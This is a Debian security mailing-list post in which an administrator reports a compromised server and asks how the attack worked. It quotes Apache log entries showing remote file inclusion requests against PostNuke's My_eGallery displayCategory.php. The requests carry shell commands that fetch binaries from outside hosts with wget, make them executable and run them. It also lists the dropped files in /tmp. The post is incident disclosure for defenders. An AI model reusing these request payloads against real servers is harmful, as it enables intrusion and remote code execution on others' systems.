Hello debian-security, One of my servers has been cracked into and I am looking for the weak spots of the system and also looking for ways to lock the secholes I might (also) have. The linux box is an up-to-date woody (incl. security updates).
My first question is how come such a thing worked on my box? (I do not know php myself at all): "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd; HTTP/1.1" 200 7047 [*] see bottom of this email for further occurences The URL is part of a postnuke site and they could start up the telnetd binary with invoking an URL similar to the above URL! Is this a known sechole? I am providing some further details about these cracks for others to be aware of similar threats...: PostNuke: The Phoenix Release (0.7.2.6) (Debian unstable has version 0.732-4.2, so the first thing to do is to backport the unstable version. Or is it rather a php bug?: ii libphp-adodb 1.51-1.1 The 'adodb' database abstraction layer for p ii libphp-phplot 4.4.6-2 The graphic library for php. ii php3-cgi 3.0.18-23.1woo A server-side, HTML-embedded scripting langu ii php3-cgi-mysql 3.0.18-23.1woo Mysql module for PHP3 (cgi) ii php3-doc 3.0.18-23.1woo Documentation for PHP3 ii php4 4.1.2-6woody3 A server-side, HTML-embedded scripting langu ii php4-cgi 4.1.2-6woody3 A server-side, HTML-embedded scripting langu ii php4-gd 4.1.2-6woody3 GD module for php4 ii php4-imap 4.1.2-6woody3 IMAP module for php4 ii php4-ldap 4.1.2-6woody3 LDAP module for php4 ii php4-mysql 4.1.2-6woody3 MySQL module for php4 ii php4-pear 4.2.1-3 PEAR - PHP Extension and Application Reposit ii php4-pear-log 1.1-1 Log module for PEAR ii php4-pgsql 4.1.2-4 PostgreSQL module for php4 ii phplib 7.2d-3.1 Library for easy writing web applications (s ii phpmyadmin 2.5.2-1woody2. A set of PHP-scripts to administrate MySQL o ii phpnuke 6.0-10 A web portal and community system, mostly li ii phppgadmin 2.4.1-2 A set of PHP-scripts to administrate Postgre ii phpsysinfo 2.0-3woody1 PHP Based Host Information ) $modversion['name'] = 'My_eGallery'; // Module Name $modversion['version'] = '3.1.1'; // Version Number The telnetd and other ELF executables they used and that were found in /tmp are the following: -rwxr-xr-x 1 www-data www-data 2897 ptrace -rwxrwxrwx 1 www-data www-data 19242 r0nin.txt -rw-r--r-- 1 www-data www-data 19242 r0nin.txt.1 -rw-r--r-- 1 www-data www-data 19242 r0nin.txt.2 -rw-r--r-- 1 www-data www-data 1325904 r.txt -rwxr-xr-x 1 www-data www-data 17643 suco.txt -rwxrwxrwx 1 www-data www-data 170613 telnetd -rw-r--r-- 1 www-data www-data 170613 telnetd.1 -rw-r--r-- 1 www-data www-data 170613 telnetd.2 -rw-r--r-- 1 www-data www-data 170613 telnetd.3 -rwxr-xr-x 1 www-data www-data 17836 x -rwxr-xr-x 1 www-data www-data 5013 x0x -rwsrwsrwt 1 www-data www-data 7180 xiit -rw-r--r-- 1 www-data www-data 7180 xiit.1 -rw-r--r-- 1 www-data www-data 7180 xiit.2 The following was found in the directory of displayCategory.php: -rwxr-xr-x 1 www-data www-data 6453 bd.cgi Some other interesting details: www-data 11584 0.0 0.1 2536 1288 ? S 18:57 0:00 wget http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt a wget-log file was open in /tmp, containing: --18:57:51-- http://www.cyberlordsteam.hpg.ig.com.br/exploits/r.txt => `r.txt' Resolving www.cyberlordsteam.hpg.ig.com.br... done. Connecting to www.cyberlordsteam.hpg.ig.com.br[200.226.137.10]:80... connected. HTTP request sent, awaiting response... 200 OK Length: 4,590,900 [text/plain] 3% [> ] 174,224 796.04B/s ETA 1:32:28 And I also still got those binaries they used. Is anyone interested to take a look at them? Thank you. Regs, Csan PS 1: Please Cc: me as I am not subscribed to the list. And I wouldn't like to, if possible. PS 2: further apache log crack entries: 200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 7047 200.249.4.237 - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://geocities.yahoo.com.br/dcha0s/cse.gif?&cmd=id;uname%20-a;pwd;cd%20/;cd%20tmp;wget%20www.fdlsk8.hpg.ig.com.br/telnetd;chmod%20777%20telnetd; HTTP/1.1" 200 7047 200.234.12.110 - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a;pwd HTTP/1.1" 200 3856 adsl-67-36-72-129.dsl.sfldmi.ameritech.net - - "GET /index/My_eGallery/public/displayCategory.php?basepath=http://www.jesusaleluia.iwebland.com/dcphp3.gif?&cmd=id;uname%20-a HTTP/1.0" 200 21034 200-171-247-29.customer.telesp.net.br - - "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://iradex.8bit.co.uk/&cmd=uname%20-a;id HTTP/1.1" 200 30021 201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097 201-0-210-187.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20www.anjosdoasfalto.com/r0nin.txt;chmod%20777%20r0nin.txt;./r0nin.txt HTTP/1.1" 200 1625 200-158-210-235.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.cimentsorigny.com/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2250 201-0-210-29.dial-up.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097 frb9-d9bb4672.pool.mediaways.net - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://ago.edns.ig3.net&cmd=uname%20-a HTTP/1.1" 200 1215 200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=uname%20-a;id HTTP/1.1" 200 2097 200-158-210-117.dsl.telesp.net.br - - "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;wget%20http://inf3ction.port5.com/xiit;chmod%207777%20xiit;./xiit HTTP/1.1" 200 1610 Csan alias János Holányi Debian Group leader - Association of Hungarian Linux Users gpg --keyserver hkp://pgp.mit.edu --recv-keys 82CBB661 -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
